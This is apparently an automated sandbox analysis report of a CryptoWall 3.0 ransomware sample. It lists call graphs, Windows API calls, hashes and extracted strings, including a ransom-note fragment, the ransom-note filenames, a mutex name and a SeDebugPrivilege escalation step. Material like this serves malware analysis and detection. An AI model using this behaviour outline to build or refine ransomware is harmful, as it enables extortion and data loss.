22005->22202 22007->22005 22009 41d753 22007->22009 22010 425203 66 API calls 22007->22010 22008 41dc50 22008->21913 22079 425203 22008->22079 22011 41d76a 22009->22011 22012 425203 66 API calls 22009->22012 22010->22009 22013 41d784 7 API calls 22011->22013 22015 425203 66 API calls 22011->22015 22012->22011 22145 424820 22013->22145 22015->22013 22017 424820 __NMSG_WRITE 66 API calls 22018 41d80d 22017->22018 22019 424820 __NMSG_WRITE 66 API calls 22018->22019 22020 41d821 SHGetFolderPathW SHGetFolderPathW GetModuleFileNameW 22019->22020 22021 424895 __wsetenvp 66 API calls 22020->22021 22022 41d861 22021->22022 22023 424820 __NMSG_WRITE 66 API calls 22022->22023 22024 41d875 DeleteFileW 22023->22024 22154 41e7a0 CreateFileW 22024->22154 22027 41d8a4 22157 41e810 GetCurrentProcess OpenProcessToken 22027->22157 22028 41d8af 22164 41ddd0 22028->22164 22031 41d8bb 22032 41d8f3 22031->22032 22034 41d8d1 22031->22034 22036 41d90e CreateMutexW GetLastError 22032->22036 22183 41dee0 22032->22183 22037 41d8d5 22034->22037 22038 41d8dc 22034->22038 22035 41d906 22035->22005 22035->22036 22036->22005 22039 41d92c _memset 22036->22039 22037->22036 22037->22038 22210 41ed00 99 API calls CatchGuardHandler 22038->22210 22042 41d93c GetVersionExW 22039->22042 22041 41d8e1 22041->22005 22211 41d210 12 API calls 2 library calls 22041->22211 22212 401bf0 132 API calls 22042->22212 22045 41d959 22213 41e150 12 API calls 22045->22213 22046 41d8ee 22046->22005 22048 41d95e 22214 41efe0 97 API calls __strftime_l 22048->22214 22050 41d995 22215 41efe0 97 API calls __strftime_l 22050->22215 22052 41d9ef CreateThread 22053 41da1c _memset 22052->22053 22216 424cd4 136 API calls 2 library calls 22053->22216 22055 41da42 22056 41da7c 22055->22056 22217 424d26 104 API calls 7 library calls 22055->22217 22060 41da92 CreateThread 22056->22060 22061 41daaa CreateThread CreateThread SetThreadPriority WaitForSingleObject 22056->22061 22058 41da70 22218 424f0c 102 API calls 5 library calls 22058->22218 22060->22061 22219 41dc60 74 API calls 4 library calls 22061->22219 22335 41e5b0 90 API calls 2 library calls 22061->22335 22063 41dae7 _memset 22220 42441c 22063->22220 22066 424820 __NMSG_WRITE 66 API calls 22067 41db33 ShellExecuteW 22066->22067 22068 42441c __NMSG_WRITE 66 API calls 22067->22068 22069 41db6a 22068->22069 22070 424820 __NMSG_WRITE 66 API calls 22069->22070 22071 41db80 ShellExecuteW 22070->22071 22072 42441c __NMSG_WRITE 66 API calls 22071->22072 22073 41dbb4 22072->22073 22074 424820 __NMSG_WRITE 66 API calls 22073->22074 22075 41dbca 22074->22075 22229 41e3f0 32 API calls CatchGuardHandler 22075->22229 22077 41dbd6 ShellExecuteW CreateThread WaitForSingleObject CreateThread WaitForSingleObject 22230 41e050 22077->22230 22336 4250c3 22079->22336 22081 425214 22081->21913 22082->21886 22083->21890 22088->21916 22089->21925 22090->21930 22091->21932 22094 42bb5f 22092->22094 22095 4277f8 22094->22095 22096 42bb7d Sleep 22094->22096 22100 42cac0 22094->22100 22095->21933 22095->21939 22097 42bb92 22096->22097 22097->22094 22097->22095 22098->21943 22099->21927 22101 42cacc 22100->22101 22105 42cae7 22100->22105 22102 42cad8 22101->22102 22101->22105 22109 42570d 66 API calls __getptd_noexit 22102->22109 22104 42cafa RtlAllocateHeap 22104->22105 22108 42cb21 22104->22108 22105->22104 22105->22108 22110 426981 DecodePointer 22105->22110 22106 42cadd 22106->22094 22108->22094 22109->22106 22110->22105 22111->21963 22112->21969 22114 4248a3 22113->22114 22115 4248aa 22113->22115 22114->22115 22118 4248cb 22114->22118 22125 42570d 66 API calls __getptd_noexit 22115->22125 22119 4248b9 22118->22119 22127 42570d 66 API calls __getptd_noexit 22118->22127 22119->21973 22121 4248af 22126 425a62 11 API calls __wsopen_helper 22121->22126 22122->21974 22123->21974 22124->21983 22125->22121 22126->22119 22127->22121 22129 42a7f8 EncodePointer 22128->22129 22129->22129 22130 42a812 22129->22130 22130->21987 22131->21989 22133 41d4ec LoadStringW LoadStringW 22132->22133 22134 41e8a0 LoadIconW LoadCursorW LoadIconW RegisterClassExW 22133->22134 22134->21994 22136 421b00 22135->22136 22137 421aae 22135->22137 22136->22000 22138 421ab0 GetTickCount 22137->22138 22248 425318 22138->22248 22140 421abc 22142 425318 66 API calls 22140->22142 22251 42532a 22140->22251 22143 421adb Sleep 22142->22143 22143->22138 22144 421af2 22143->22144 22144->22000 22146 424835 22145->22146 22149 42482e 22145->22149 22279 42570d 66 API calls __getptd_noexit 22146->22279 22148 42483a 22280 425a62 11 API calls __wsopen_helper 22148->22280 22149->22146 22152 42486a 22149->22152 22151 41d7fa 22151->22017 22152->22151 22281 42570d 66 API calls __getptd_noexit 22152->22281 22155 41d888 LookupPrivilegeValueA 22154->22155 22156 41e7c8 SetFilePointer ReadFile CloseHandle 22154->22156 22155->22027 22155->22028 22156->22155 22158 41e848 AdjustTokenPrivileges CloseHandle 22157->22158 22159 41e83a 22157->22159 22161 423ebb CatchGuardHandler 5 API calls 22158->22161 22160 423ebb CatchGuardHandler 5 API calls 22159->22160 22162 41e844 22160->22162 22163 41e890 22161->22163 22162->22028 22163->22028 22165 41dde7 SetLastError 22164->22165 22166 41ddfa GetCurrentProcess OpenProcessToken 22164->22166 22165->22031 22167 41de12 GetLastError 22166->22167 22168 41de1d GetTokenInformation 22166->22168 22178 41de91 22167->22178 22169 41de4a LocalAlloc 22168->22169 22170 41de3c GetLastError 22168->22170 22174 41de63 GetTokenInformation 22169->22174 22175 41de5c GetLastError 22169->22175 22170->22169 22173 41de43 GetLastError 22170->22173 22171 41dea5 22176 41deb3 22171->22176 22177 41dea9 LocalFree 22171->22177 22172 41de9b CloseHandle 22172->22171 22173->22178 22179 41de78 GetLastError 22174->22179 22180 41de7f GetSidSubAuthority 22174->22180 22175->22178 22181 41deb9 SetLastError 22176->22181 22182 41deca 22176->22182 22177->22176 22178->22171 22178->22172 22179->22178 22180->22178 22181->22031 22182->22031 22184 41def0 _memset __write_nolock 22183->22184 22185 421aa0 68 API calls 22184->22185 22186 41df29 PathFindFileNameW 22185->22186 22282 41f000 22186->22282 22189 41e039 22191 423ebb CatchGuardHandler 5 API calls 22189->22191 22190 41df8e 22192 41f000 97 API calls 22190->22192 22193 41e04b 22191->22193 22194 41dfaf _memset 22192->22194 22193->22035 22195 41dfc0 CopyFileW 22194->22195 22196 41dfdc CreateProcessW 22194->22196 22195->22194 22196->22195 22197 41e01b 22196->22197 22198 41e050 70 API calls 22197->22198 22199 41e020 22198->22199 22200 423ebb CatchGuardHandler 5 API calls 22199->22200 22201 41e035 22200->22201 22201->22035 22203 423ec3 22202->22203 22204 423ec5 IsDebuggerPresent 22202->22204 22203->22008 22331 42af1f 22204->22331 22207 425604 SetUnhandledExceptionFilter UnhandledExceptionFilter 22208 425629 GetCurrentProcess TerminateProcess 22207->22208 22209 425621 __call_reportfault 22207->22209 22208->22008 22209->22208 22210->22041 22211->22046 22212->22045 22213->22048 22214->22050 22215->22052 22216->22055 22217->22058 22218->22056 22219->22063 22221 42442e 22220->22221 22223 41db1d 22221->22223 22225 424432 22221->22225 22227 424475 22221->22227 22223->22066 22224 42444e 22333 425a62 11 API calls __wsopen_helper 22224->22333 22225->22223 22332 42570d 66 API calls __getptd_noexit 22225->22332 22227->22223 22334 42570d 66 API calls __getptd_noexit 22227->22334 22229->22077 22231 42c690 __write_nolock 22230->22231 22232 41e05d GetModuleFileNameW 22231->22232 22233 41e083 GetShortPathNameW 22232->22233 22234 41e13b 22232->22234 22233->22234 22236 41e0a0 22233->22236 22235 423ebb CatchGuardHandler 5 API calls 22234->22235 22237 41e147 22235->22237 22238 42441c __NMSG_WRITE 66 API calls 22236->22238 22237->22005 22239 41e0bb 22238->22239 22240 424820 __NMSG_WRITE 66 API calls 22239->22240 22241 41e0d3 22240->22241 22242 424820 __NMSG_WRITE 66 API calls 22241->22242 22243 41e0e9 GetEnvironmentVariableW 22242->22243 22243->22234 22244 41e107 ShellExecuteW 22243->22244 22244->22234 22245 41e128 22244->22245 22246 423ebb CatchGuardHandler 5 API calls 22245->22246 22247 41e137 22246->22247 22247->22005 22254 427576 22248->22254 22252 427576 __getptd 66 API calls 22251->22252 22253 42532f 22252->22253 22253->22140 22259 4274fd GetLastError 22254->22259 22256 42757e 22257 425322 22256->22257 22273 42524d 66 API calls 3 library calls 22256->22273 22257->22140 22274 4273d8 TlsGetValue 22259->22274 22262 42756a SetLastError 22262->22256 22263 42bb56 __calloc_crt 62 API calls 22264 427528 22263->22264 22264->22262 22265 427530 DecodePointer 22264->22265 22266 427545 22265->22266 22267 427561 22266->22267 22268 427549 22266->22268 22278 424005 66 API calls 2 library calls 22267->22278 22277 427449 66 API calls 4 library calls 22268->22277 22271 427567 22271->22262 22272 427551 GetCurrentThreadId 22272->22262 22275 427408 22274->22275 22276 4273ed DecodePointer TlsSetValue 22274->22276 22275->22262 22275->22263 22276->22275 22277->22272 22278->22271 22279->22148 22280->22151 22281->22148 22285 424225 22282->22285 22288 424135 22285->22288 22287 41df54 CreateFileW GetLastError CloseHandle 22287->22189 22287->22190 22289 424140 22288->22289 22290 424155 22288->22290 22319 42570d 66 API calls __getptd_noexit 22289->22319 22292 424166 22290->22292 22294 42418d 22290->22294 22317 42416b 22292->22317 22321 42570d 66 API calls __getptd_noexit 22292->22321 22293 424145 22320 425a62 11 API calls __wsopen_helper 22293->22320 22322 42570d 66 API calls __getptd_noexit 22294->22322 22297 424182 22330 425a62 11 API calls __wsopen_helper 22297->22330 22299 424150 22299->22287 22300 424192 22302 4241c9 22300->22302 22303 42419f 22300->22303 22326 42403f 97 API calls 2 library calls 22302->22326 22323 42403f 97 API calls 2 library calls 22303->22323 22306 4241d7 22308 4241ff 22306->22308 22310 4241ec 22306->22310 22307 4241ae 22307->22308 22309 4241b6 22307->22309 22308->22317 22329 42570d 66 API calls __getptd_noexit 22308->22329 22324 42570d 66 API calls __getptd_noexit 22309->22324 22327 42570d 66 API calls __getptd_noexit 22310->22327 22313 4241bb 22313->22317 22325 42570d 66 API calls __getptd_noexit 22313->22325 22314 4241f1 22314->22317 22328 42570d 66 API calls __getptd_noexit 22314->22328 22317->22287 22319->22293 22320->22299 22321->22297 22322->22300 22323->22307 22324->22313 22325->22317 22326->22306 22327->22314 22328->22317 22329->22297 22330->22317 22331->22207 22332->22224 22333->22223 22334->22224 22337 4250cf ___BuildCatchObjectHelper 22336->22337 22357 42a4bb 22337->22357 22339 4250d6 22341 425101 RtlDecodePointer 22339->22341 22345 425180 22339->22345 22342 425118 DecodePointer 22341->22342 22341->22345 22351 42512b 22342->22351 22344 4251fd ___BuildCatchObjectHelper 22344->22081 22364 4251ee 22345->22364 22348 4251e5 22369 424fab 22348->22369 22351->22345 22353 425142 DecodePointer 22351->22353 22356 425151 DecodePointer DecodePointer 22351->22356 22372 4273c6 RtlEncodePointer 22351->22372 22373 4273c6 RtlEncodePointer 22353->22373 22356->22351 22358 42a4e3 EnterCriticalSection 22357->22358 22359 42a4d0 22357->22359 22358->22339 22374 42a3f9 66 API calls 9 library calls 22359->22374 22361 42a4d6 22361->22358 22375 42524d 66 API calls 3 library calls 22361->22375 22365 4251f4 22364->22365 22366 4251ce 22364->22366 22376 42a3e2 LeaveCriticalSection 22365->22376 22366->22344 22368 42a3e2 LeaveCriticalSection 22366->22368 22368->22348 22377 424f80 GetModuleHandleW 22369->22377 22372->22351 22373->22351 22374->22361 22376->22366 22378 424f94 GetProcAddress 22377->22378 22379 424fa9 ExitProcess 22377->22379 22378->22379 22380 424fa4 22378->22380 22380->22379 22399 42f226 69 API calls 3 library calls 22401 429a00 6 API calls 3 library calls 21852 3b107d 21853 3b107f LoadLibraryA 21852->21853 21854 3b108b 21853->21854 22469 3b137c VirtualProtect 22402 41e609 89 API calls _memset 22470 425b08 102 API calls 10 library calls 22404 401010 66 API calls ctype 22472 42a512 68 API calls 2 library calls 21875 3b1b6a 16 API calls 22407 41ae10 42 API calls 2 library calls 22477 411120 8 API calls CatchGuardHandler 22478 41e920 12 API calls CatchGuardHandler 22418 41a030 119 API calls 3 library calls 21772 3b13bb 21773 3b13d6 21772->21773 21774 3b13e8 VirtualProtect 21773->21774 21775 3b13f4 21774->21775 22422 41ecc0 GetModuleHandleW GetProcAddress InterlockedExchange SetWindowLongW 22483 415bc0 7 API calls 22484 4273cf TlsAlloc 21873 3b21ab RtlExitUserThread 22424 42d8d0 RtlUnwind 22487 3b1fa9 10 API calls 22488 4254e1 5 API calls ___security_init_cookie 22487->22488 22493 42dfe7 IsProcessorFeaturePresent 22432 4268ee 67 API calls __calloc_crt 22494 4129ec _aullshr _memset 22433 3b068b EnumWindows EnumWindows 22434 4142f0 _aullshr _aullshr _memset _memmove 22499 41b7f4 12 API calls CatchGuardHandler 22439 3b1efa 12 API calls 22440 4254e1 5 API calls ___security_init_cookie 22439->22440 22502 3b15fa VirtualProtect VirtualProtect 22504 414780 8 API calls 22505 413780 143 API calls _memset 22442 3b20f7 CreateThread RtlExitUserThread RtlExitUserThread 22443 4254e1 5 API calls ___security_init_cookie 22442->22443 22444 3b1af5 17 API calls 22508 41d390 72 API calls 2 library calls 22509 427590 75 API calls 6 library calls 22448 41b668 18 API calls CatchGuardHandler 22513 42a9ae SetUnhandledExceptionFilter 22449 4294ad 107 API calls 3 library calls 22451 4148b0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22515 42edb9 73 API calls ___InternalCxxFrameHandler

                                                                                                                            Executed Functions

                                                                                                                            Function 0041D4D0 Relevance: 107.3, APIs: 44, Strings: 17, Instructions: 554threadsynchronizationcomCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 41d4d0-41d578 call 42c690 LoadStringW * 2 call 41e8a0 CoInitializeEx AllocateAndInitializeSid 5 41d57a-41d591 CheckTokenMembership 0->5 6 41d5ac-41d68a SHGetFolderPathW call 421aa0 CoCreateInstance * 2 0->6 7 41d593 5->7 8 41d599-41d5a6 FreeSid 5->8 13 41d694-41d6cd call 42b910 6->13 14 41d68c-41d68e ExitProcess 6->14 7->8 8->6 18 41d6d0-41d6d6 13->18 19 41d6f6-41d6f8 18->19 20 41d6d8-41d6db 18->20 23 41d6fb-41d6fd 19->23 21 41d6f2-41d6f4 20->21 22 41d6dd-41d6e5 20->22 21->23 22->19 24 41d6e7-41d6f0 22->24 25 41d706-41d71d 23->25 26 41d6ff-41d701 call 425203 23->26 24->18 24->21 29 41dc33-41dc53 call 423ebb 25->29 30 41d723-41d729 25->30 26->25 30->29 32 41d72f-41d74a 30->32 35 41d753-41d761 32->35 36 41d74c-41d74e call 425203 32->36 38 41d763-41d765 call 425203 35->38 39 41d76a-41d77b 35->39 36->35 38->39 42 41d784-41d8a2 GetModuleHandleW GetProcAddress * 2 SHGetFolderPathW * 3 SHGetSpecialFolderPathW call 424820 * 3 SHGetFolderPathW * 2 GetModuleFileNameW call 424895 call 424820 DeleteFileW call 41e7a0 LookupPrivilegeValueA 39->42 43 41d77d-41d77f call 425203 39->43 57 41d8a4-41d8aa call 41e810 42->57 58 41d8af-41d8c0 call 41ddd0 42->58 43->42 57->58 62 41d901 call 41dee0 58->62 63 41d8c2-41d8cd 58->63 69 41d906-41d908 62->69 64 41d8f3-41d8f8 63->64 65 41d8cf 63->65 64->62 68 41d8fa-41d8ff 64->68 65->62 67 41d8d1-41d8d3 65->67 71 41d8d5-41d8da 67->71 72 41d8dc-41d8e3 call 41ed00 67->72 68->62 70 41d90e-41d926 CreateMutexW GetLastError 68->70 69->29 69->70 70->29 73 41d92c-41da47 call 42b910 GetVersionExW call 401bf0 call 41e150 call 41efe0 * 2 CreateThread call 42b910 call 421a60 call 424cd4 70->73 71->70 71->72 72->29 78 41d8e9-41d8ee call 41d210 72->78 95 41da49-41da7c call 424d26 call 424f0c 73->95 96 41da7f-41da90 call 421b20 73->96 78->29 95->96 102 41da92-41daa4 CreateThread 96->102 103 41daaa-41dc2e CreateThread * 2 SetThreadPriority WaitForSingleObject call 41dc60 call 42b910 call 42441c call 424820 ShellExecuteW call 42441c call 424820 ShellExecuteW call 42441c call 424820 call 41e3f0 ShellExecuteW CreateThread WaitForSingleObject CreateThread WaitForSingleObject call 41e050 96->103 102->103 103->29
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000067,scan,00000064), ref: 0041D519
                                                                                                                            • LoadStringW.USER32(?,0000006D,SCAN,00000064), ref: 0041D525
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E8D6
                                                                                                                              • Part of subcall function 0041E8A0: LoadCursorW.USER32 ref: 0041E8E2
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E906
                                                                                                                              • Part of subcall function 0041E8A0: RegisterClassExW.USER32(00000030), ref: 0041E90F
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0041D532
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 0041D56A
                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0041D589
                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0041D5A0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,004C8B20), ref: 0041D5C1
                                                                                                                            • CoCreateInstance.OLE32(004365C8,00000000,00000001,00431338,?), ref: 0041D627
                                                                                                                            • CoCreateInstance.OLE32(004365D8,00000000,00000001,00431328,?), ref: 0041D63D
                                                                                                                            • ExitProcess.KERNEL32 ref: 0041D68E
                                                                                                                            • _memset.LIBCMT ref: 0041D6AA
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041D789
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041D79D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041D7AA
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,004CEB20), ref: 0041D7BD
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,004D0B20), ref: 0041D7C9
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,004D2B20), ref: 0041D7D5
                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,004D4B20,00000005,00000000), ref: 0041D7E0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,004CAB20), ref: 0041D82E
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,004CCB20), ref: 0041D83A
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004C6B20,00001000), ref: 0041D847
                                                                                                                            • DeleteFileW.KERNEL32(004C4B20), ref: 0041D87D
                                                                                                                              • Part of subcall function 0041E7A0: CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                              • Part of subcall function 0041E7A0: SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                              • Part of subcall function 0041E7A0: ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                              • Part of subcall function 0041E7A0: CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041D89A
                                                                                                                              • Part of subcall function 0041E810: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                              • Part of subcall function 0041E810: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,435-3435-4546), ref: 0041D915
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D91B
                                                                                                                            • _memset.LIBCMT ref: 0041D937
                                                                                                                            • GetVersionExW.KERNEL32(0043C728), ref: 0041D94E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DA02
                                                                                                                            • _memset.LIBCMT ref: 0041DA17
                                                                                                                            • __wfopen_s.LIBCMT ref: 0041DA3D
                                                                                                                            • _fprintf.LIBCMT ref: 0041DA6B
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DAA2
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0041E5B0,00000000,00000000,00000000), ref: 0041DABE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00013780,00000000,00000000,00000000), ref: 0041DACA
                                                                                                                            • SetThreadPriority.KERNEL32(00000000,000000F1), ref: 0041DAD1
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DAE0
                                                                                                                            • _memset.LIBCMT ref: 0041DAFD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB4D
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB97
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DBED
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DBFE
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0001D4C0), ref: 0041DC0C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DC27
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DC2C
                                                                                                                              • Part of subcall function 0041E050: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                              • Part of subcall function 0041E050: GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                              • Part of subcall function 0041E050: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                              • Part of subcall function 0041E050: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            • %s%s%s%S, xrefs: 0041DA65
                                                                                                                            • \RESTORE_FILES.BMP, xrefs: 0041DBB4
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041D981
                                                                                                                            • Wow64DisableWow64FsRedirection, xrefs: 0041D797
                                                                                                                            • \RESTORE_FILES.TXT, xrefs: 0041DB1D
                                                                                                                            • Wow64RevertWow64FsRedirection, xrefs: 0041D79F
                                                                                                                            • .txt, xrefs: 0041D80D
                                                                                                                            • SeDebugPrivilege, xrefs: 0041D894
                                                                                                                            • open, xrefs: 0041DB41, 0041DB90, 0041DBE6
                                                                                                                            • \Recovery_File_, xrefs: 0041D7E6
                                                                                                                            • scan, xrefs: 0041D511
                                                                                                                            • 435-3435-4546, xrefs: 0041D90E
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041D9DB
                                                                                                                            • KERNEL32, xrefs: 0041D784
                                                                                                                            • :Zone.Identifier, xrefs: 0041D861
                                                                                                                            • SCAN, xrefs: 0041D51D
                                                                                                                            • \RESTORE_FILES.HTML, xrefs: 0041DB6A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$Path$FolderThread$File$Load$ExecuteShell_memset$ModuleNameObjectProcessSingleWait$AddressHandleIconInitializeInstanceProcStringToken$AllocateCheckClassCloseCurrentCursorDeleteEnvironmentErrorExitFreeLastLookupMembershipMutexOpenPointerPriorityPrivilegeReadRegisterShortSpecialValueVariableVersion__wfopen_s_fprintf
                                                                                                                            • String ID: %s%s%s%S$.txt$435-3435-4546$:Zone.Identifier$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$KERNEL32$SCAN$SeDebugPrivilege$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\RESTORE_FILES.BMP$\RESTORE_FILES.HTML$\RESTORE_FILES.TXT$\Recovery_File_$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$open$scan
                                                                                                                            • API String ID: 1728785742-2454956091
                                                                                                                            • Opcode ID: b9b3065ef54fea5832a63d74bc4c9a3bc535528440381a5f7b6ab5b4d906ee62
                                                                                                                            • Instruction ID: b9353f63490a9340779b0bdb0cd734671b1939fc783d41848026e497fe5a03ea
                                                                                                                            • Opcode Fuzzy Hash: b9b3065ef54fea5832a63d74bc4c9a3bc535528440381a5f7b6ab5b4d906ee62
                                                                                                                            • Instruction Fuzzy Hash: C502D7B0A40318BEE720EB609C86FEA7678EB58744F50459BF604B61D1D7B86D80CB6D
                                                                                                                            Function 0041E810 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 0041E871
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041E87B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3874597930-0
                                                                                                                            • Opcode ID: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction ID: 269530095bf515f302acf201c8fd37964e73f2dce42f1b02fb8cc585cf08c6bc
                                                                                                                            • Opcode Fuzzy Hash: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction Fuzzy Hash: DA01B530A002089BDB14DFE4DD46BAEB7B8FF48700F50406DE606A7380DB746944CB99
                                                                                                                            Function 003B1AF5 Relevance: 3.3, APIs: 2, Instructions: 283memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 003B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                              • Part of subcall function 003B1DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: f7b01f3da82970626e35ce751784ccd82f0bf63adb196079f7b6b43d082fefa5
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
